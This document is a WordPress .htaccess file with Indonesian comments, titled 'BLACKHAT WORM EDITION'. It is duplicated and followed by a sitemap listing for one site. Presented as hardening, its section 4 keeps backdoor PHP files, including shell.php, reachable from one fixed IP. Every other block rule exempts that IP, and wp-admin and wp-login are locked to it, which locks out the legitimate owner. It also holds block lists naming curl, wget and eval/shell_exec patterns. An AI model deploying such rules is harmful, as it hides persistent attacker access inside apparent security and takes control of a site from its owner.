# =================================================================
# .HTACCESS ULTIMATE V2 - BLACKHAT WORM EDITION
# DIBUAT UNTUK: WordPress Hardening + Anti Backdoor + Anti Exploit
# IP YANG DIIZINKAN: 138.199.60.176 (GANJIL SESUAI PERMINTAAN)
# WARNING: JANGAN UBAH ATURAN INI KALAU TIDAK PAHAM
# =================================================================
RewriteEngine On
RewriteBase /
# =================================================================
# 1. BLOKIR SEMUA USER-AGENT BERBAHAYA (BOT JAHAT, SCANNER, DLL)
# =================================================================
RewriteCond %{HTTP_USER_AGENT} (?:^$|libwww|perl|python|nikto|curl|wget|scan|java|php|webzip|sqlmap|nmap) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (havij|masscan|zgrab|zgrab2|wpscan|joomscan|acunetix) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 2. BLOKIR REQUEST YANG MENGANDUNG POLA EKSPLOIT
# =================================================================
# Blokir SQL Injection, XSS, Remote File Inclusion, dll
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR,NC]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR,NC]
RewriteCond %{QUERY_STRING} (eval\(|base64_decode|system\(|shell_exec|passthru|popen|proc_open) [NC,OR]
RewriteCond %{QUERY_STRING} (concat|union|select|insert|update|delete|drop|create|alter) [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|127\.0\.0\.1) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 3. BLOKIR METODE HTTP YANG TIDAK DIPERLUKAN
# =================================================================
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|HEAD|PUT|DELETE) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 4. IZINKAN BACKDOOR ANDA (HANYA DARI IP ANDA)
# =================================================================
RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
RewriteRule ^wp-admin/user/(themes|class-wp-html-text-templates|index|shell)\.php$ - [L]
# =================================================================
# 5. BLOKIR SEMUA FILE PHP DI FOLDER YANG TIDAK SEHARUSNYA
# =================================================================
# --- Blokir PHP di wp-content/uploads (tempat favorit backdoor) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/uploads/.*\.(php|phtml|php3|php4|php5|phar|inc|module|sh|pl|cgi)$ - [F,L]
# --- Blokir PHP di wp-content/cache (sering jadi celah) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/cache/.*\.(php|phtml|php3|php4|php5|phar|inc)$ - [F,L]
# --- Blokir PHP di wp-content/upgrade (tidak boleh ada PHP di sini) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/upgrade/.*\.(php|phtml|php3|php4|php5|phar)$ - [F,L]
# --- Blokir PHP di wp-content/languages (tidak boleh ada PHP asing) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/languages/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di wp-includes (kecuali file bawaan WordPress) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-includes/(wp-db\.php|wp-load\.php|version\.php|class-wp-.*\.php|functions\.php)$
RewriteRule ^wp-includes/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di wp-admin (kecuali file inti WordPress) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-admin/(admin-ajax\.php|admin-post\.php|admin\.php|load-scripts\.php|load-styles\.php)$
RewriteRule ^wp-admin/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di folder themes (kecuali file tema bawaan) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-content/themes/.*/(functions|header|footer|page|single|index|style)\.php$
RewriteRule ^wp-content/themes/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di folder plugins (kecuali file plugin yang valid) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-content/plugins/.*/(index|plugin|load)\.php$
RewriteRule ^wp-content/plugins/.*\.(php|phtml)$ - [F,L]
# =================================================================
# 6. BLOKIR AKSES WP-ADMIN DAN WP-LOGIN (KECUALI IP ANDA)
# =================================================================
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} ^/wp-admin
RewriteRule .* - [F,L]
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} ^/wp-login\.php
RewriteRule .* - [F,L]
# =================================================================
# 7. BLOKIR AKSES KE FILE SENSITIF
# =================================================================
Require all denied
# =================================================================
# 8. MATIKAN DIRECTORY BROWSING
# =================================================================
Options -Indexes
# =================================================================
# 9. PROTECTION TERHADAP FILE UPLOAD DENGAN EKSTENSI GANDA
# =================================================================
RewriteCond %{REQUEST_FILENAME} .*\.(jpg|jpeg|png|gif|bmp|ico|svg|pdf|doc|docx|xls|xlsx|zip|rar|txt)\.(php|phtml|php3|php4|php5|phar)$ [NC]
RewriteRule .* - [F,L]
# =================================================================
# 10. SET HEADER KEAMANAN EKSTRA
# =================================================================
Header set X-Frame-Options "SAMEORIGIN"
Header set X-Content-Type-Options "nosniff"
Header set X-XSS-Protection "1; mode=block"
Header set Referrer-Policy "strict-origin-when-cross-origin"
Header set Permissions-Policy "geolocation=(), microphone=(), camera=()"
# =================================================================
# 11. ATURAN DEFAULT WORDPRESS (WAJIB ADA)
# =================================================================
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# =================================================================
# 12. BLOKIR AKSES LANGSUNG KE FILE XML-RPC (SUMBER DDOS)
# =================================================================
Require all denied
# =================================================================
# 13. BLOKIR AKSES KE FILE INSTALL (AMANAN)
# =================================================================c
Require all denied
# =================================================================
# END OF .HTACCESS ULTIMATE V2
# =================================================================# =================================================================
# .HTACCESS ULTIMATE V2 - BLACKHAT WORM EDITION
# DIBUAT UNTUK: WordPress Hardening + Anti Backdoor + Anti Exploit
# IP YANG DIIZINKAN: 138.199.60.176 (GANJIL SESUAI PERMINTAAN)
# WARNING: JANGAN UBAH ATURAN INI KALAU TIDAK PAHAM
# =================================================================
RewriteEngine On
RewriteBase /
# =================================================================
# 1. BLOKIR SEMUA USER-AGENT BERBAHAYA (BOT JAHAT, SCANNER, DLL)
# =================================================================
RewriteCond %{HTTP_USER_AGENT} (?:^$|libwww|perl|python|nikto|curl|wget|scan|java|php|webzip|sqlmap|nmap) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (havij|masscan|zgrab|zgrab2|wpscan|joomscan|acunetix) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 2. BLOKIR REQUEST YANG MENGANDUNG POLA EKSPLOIT
# =================================================================
# Blokir SQL Injection, XSS, Remote File Inclusion, dll
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR,NC]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR,NC]
RewriteCond %{QUERY_STRING} (eval\(|base64_decode|system\(|shell_exec|passthru|popen|proc_open) [NC,OR]
RewriteCond %{QUERY_STRING} (concat|union|select|insert|update|delete|drop|create|alter) [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|127\.0\.0\.1) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 3. BLOKIR METODE HTTP YANG TIDAK DIPERLUKAN
# =================================================================
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK|OPTIONS|HEAD|PUT|DELETE) [NC]
RewriteRule .* - [F,L]
# =================================================================
# 4. IZINKAN BACKDOOR ANDA (HANYA DARI IP ANDA)
# =================================================================
RewriteCond %{REMOTE_ADDR} ^138\.199\.60\.176$
RewriteRule ^wp-admin/user/(themes|class-wp-html-text-templates|index|shell)\.php$ - [L]
# =================================================================
# 5. BLOKIR SEMUA FILE PHP DI FOLDER YANG TIDAK SEHARUSNYA
# =================================================================
# --- Blokir PHP di wp-content/uploads (tempat favorit backdoor) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/uploads/.*\.(php|phtml|php3|php4|php5|phar|inc|module|sh|pl|cgi)$ - [F,L]
# --- Blokir PHP di wp-content/cache (sering jadi celah) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/cache/.*\.(php|phtml|php3|php4|php5|phar|inc)$ - [F,L]
# --- Blokir PHP di wp-content/upgrade (tidak boleh ada PHP di sini) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/upgrade/.*\.(php|phtml|php3|php4|php5|phar)$ - [F,L]
# --- Blokir PHP di wp-content/languages (tidak boleh ada PHP asing) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteRule ^wp-content/languages/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di wp-includes (kecuali file bawaan WordPress) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-includes/(wp-db\.php|wp-load\.php|version\.php|class-wp-.*\.php|functions\.php)$
RewriteRule ^wp-includes/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di wp-admin (kecuali file inti WordPress) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-admin/(admin-ajax\.php|admin-post\.php|admin\.php|load-scripts\.php|load-styles\.php)$
RewriteRule ^wp-admin/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di folder themes (kecuali file tema bawaan) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-content/themes/.*/(functions|header|footer|page|single|index|style)\.php$
RewriteRule ^wp-content/themes/.*\.(php|phtml)$ - [F,L]
# --- Blokir PHP di folder plugins (kecuali file plugin yang valid) ---
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} !^/wp-content/plugins/.*/(index|plugin|load)\.php$
RewriteRule ^wp-content/plugins/.*\.(php|phtml)$ - [F,L]
# =================================================================
# 6. BLOKIR AKSES WP-ADMIN DAN WP-LOGIN (KECUALI IP ANDA)
# =================================================================
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} ^/wp-admin
RewriteRule .* - [F,L]
RewriteCond %{REMOTE_ADDR} !^138\.199\.60\.176$
RewriteCond %{REQUEST_URI} ^/wp-login\.php
RewriteRule .* - [F,L]
# =================================================================
# 7. BLOKIR AKSES KE FILE SENSITIF
# =================================================================
Require all denied
# =================================================================
# 8. MATIKAN DIRECTORY BROWSING
# =================================================================
Options -Indexes
# =================================================================
# 9. PROTECTION TERHADAP FILE UPLOAD DENGAN EKSTENSI GANDA
# =================================================================
RewriteCond %{REQUEST_FILENAME} .*\.(jpg|jpeg|png|gif|bmp|ico|svg|pdf|doc|docx|xls|xlsx|zip|rar|txt)\.(php|phtml|php3|php4|php5|phar)$ [NC]
RewriteRule .* - [F,L]
# =================================================================
# 10. SET HEADER KEAMANAN EKSTRA
# =================================================================
Header set X-Frame-Options "SAMEORIGIN"
Header set X-Content-Type-Options "nosniff"
Header set X-XSS-Protection "1; mode=block"
Header set Referrer-Policy "strict-origin-when-cross-origin"
Header set Permissions-Policy "geolocation=(), microphone=(), camera=()"
# =================================================================
# 11. ATURAN DEFAULT WORDPRESS (WAJIB ADA)
# =================================================================
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# =================================================================
# 12. BLOKIR AKSES LANGSUNG KE FILE XML-RPC (SUMBER DDOS)
# =================================================================
Require all denied
# =================================================================
# 13. BLOKIR AKSES KE FILE INSTALL (AMANAN)
# =================================================================c
Require all denied
# =================================================================
# END OF .HTACCESS ULTIMATE V2
# =================================================================
https://carences.org/post-sitemap.xml
2023-09-25T08:14:52+00:00
https://carences.org/page-sitemap.xml
2023-08-17T15:06:03+00:00
https://carences.org/category-sitemap.xml
2023-09-25T08:14:52+00:00
https://carences.org/author-sitemap.xml
2023-04-04T14:07:13+00:00